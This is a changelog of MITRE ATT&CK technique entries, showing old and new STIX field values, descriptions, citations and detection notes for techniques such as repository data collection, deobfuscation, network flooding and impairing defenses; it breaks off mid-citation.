| external_references | {'source_name': 'HIPAA Journal S3 Breach, 2017', 'description': 'HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.', 'url': 'https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/'} | |
| external_references | {'source_name': 'Rclone-mega-extortion_05_2021', 'description': 'Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.', 'url': 'https://redcanary.com/blog/rclone-mega-extortion/'} | |
| external_references | {'source_name': 'Dark Clouds_Usenix_Mulazzani_08_2011', 'description': 'Martin Mulazzani, Sebastian Schrittwieser, Manuel Leithner, Markus Huber, and Edgar Weippl. (2011, August). Dark Clouds on the Horizon: Using Cloud Storage as Attack Vector and Online Slack Space. Retrieved July 14, 2022.', 'url': 'https://www.usenix.org/conference/usenix-security-11/dark-clouds-horizon-using-cloud-storage-attack-vector-and-online-slack'} | |
| external_references | {'source_name': 'Trend Micro S3 Exposed PII, 2017', 'description': 'Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.', 'url': 'https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia'} | |
| x_mitre_contributors | AppOmni | |
| x_mitre_platforms | SaaS |
| Description |
|---|
| Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices. Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-22 02:26:44.566000+00:00 | 2022-04-19 21:32:58.274000+00:00 |
| external_references[1]['source_name'] | US-CERT-TA18-106A | Cisco Advisory SNMP v3 Authentication Vulnerabilities |
| external_references[1]['description'] | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. | Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020. |
| external_references[1]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-106A | https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3 |
| external_references[3]['source_name'] | Cisco Advisory SNMP v3 Authentication Vulnerabilities | US-CERT-TA18-106A |
| external_references[3]['description'] | Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020. | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| external_references[3]['url'] | https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3 | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| Description |
|---|
| Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:35:43.938000+00:00 | 2022-04-11 22:28:36.395000+00:00 |
| external_references[1]['source_name'] | Microsoft SharePoint Logging | Atlassian Confluence Logging |
| external_references[1]['description'] | Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018. | Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018. |
| external_references[1]['url'] | https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2 | https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html |
| external_references[2]['source_name'] | Sharepoint Sharing Events | Microsoft SharePoint Logging |
| external_references[2]['description'] | Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021. | Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events | https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2 |
| external_references[3]['source_name'] | Atlassian Confluence Logging | Sharepoint Sharing Events |
| external_references[3]['description'] | Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018. | Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021. |
| external_references[3]['url'] | https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html | https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Isif Ibrahima, Mandiant |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Isif Ibrahima |
| Old Description | New Description |
|---|---|
| Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. | Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 22:16:42.734000+00:00 | 2022-10-19 21:55:54.866000+00:00 |
| description | Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. | Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. |
| x_mitre_data_sources[0] | Script: Script Execution | Process: OS API Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_detection | Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
| x_mitre_version | 1.3 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Mandiant APT41 Global Intrusion ', 'description': 'Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.', 'url': 'https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits'} | |
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_data_sources | Script: Script Execution | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_platforms | Network |
| Description |
|---|
| Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['David Tayouri'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 15:42:44.026000+00:00 | 2022-06-16 13:08:03.209000+00:00 |
| x_mitre_data_sources[0] | File: File Access | Network Share: Network Share Access |
| x_mitre_data_sources[1] | Network Share: Network Share Access | Network Traffic: Network Connection Creation |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Access | |
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. | Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.150000+00:00 | 2022-03-25 19:34:42.056000+00:00 |
| description | Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. | Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-09 14:42:23.122000+00:00 | 2022-05-05 04:05:42.508000+00:00 |
| external_references[1]['source_name'] | Malwarebytes Targeted Attack against Saudi Arabia | Volexity PowerDuke November 2016 |
| external_references[1]['description'] | Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017. | Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. |
| external_references[1]['url'] | https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/ | https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ |
| external_references[2]['source_name'] | Carbon Black Obfuscation Sept 2016 | Malwarebytes Targeted Attack against Saudi Arabia |
| external_references[2]['description'] | Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. | Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017. |
| external_references[2]['url'] | https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ | https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/ |
| external_references[3]['source_name'] | Volexity PowerDuke November 2016 | Carbon Black Obfuscation Sept 2016 |
| external_references[3]['description'] | Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. | Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. |
| external_references[3]['url'] | https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ | https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ |
| x_mitre_defense_bypassed[1] | Host intrusion prevention systems | Host Intrusion Prevention Systems |
| x_mitre_defense_bypassed[2] | Signature-based detection | Signature-based Detection |
| x_mitre_defense_bypassed[3] | Network intrusion detection system | Network Intrusion Detection System |
| Description |
|---|
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.
Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 12:02:20.641000+00:00 | 2022-04-01 13:14:58.939000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Container: Container Start | |
| x_mitre_data_sources | Pod: Pod Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Container: Container Start | |
| x_mitre_data_sources | Pod: Pod Creation |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) | Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| external_references | Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019. | |
| external_references | CAPEC-125 | |
| external_references | CAPEC-486 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-125 | |
| external_references | CAPEC-486 | |
| external_references | Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:11:56.727000+00:00 | 2022-04-19 23:28:52.908000+00:00 |
| description | Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) | Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) |
| external_references[1]['source_name'] | capec | Cisco DoSdetectNetflow |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/125.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf |
| external_references[2]['source_name'] | capec | USNYAG IranianBotnet March 2016 |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/486.html | https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged |
| external_references[3]['source_name'] | USNYAG IranianBotnet March 2016 | capec |
| external_references[3]['url'] | https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged | https://capec.mitre.org/data/definitions/125.html |
| external_references[4]['source_name'] | Cisco DoSdetectNetflow | capec |
| external_references[4]['url'] | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf | https://capec.mitre.org/data/definitions/486.html |
| x_mitre_data_sources[0] | Sensor Health: Host Status | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Sensor Health: Host Status |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) | An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-15 16:43:04.273000+00:00 | 2022-03-08 21:55:27.505000+00:00 |
| description | An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) | An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) |
| x_mitre_contributors[2] | Sekhar Sarukkai, McAfee | Sekhar Sarukkai, McAfee |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware) Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor. Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
| external_references | CAPEC-578 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 21:27:48.159000+00:00 | 2022-10-24 15:23:59.433000+00:00 |
| description | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware) Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: 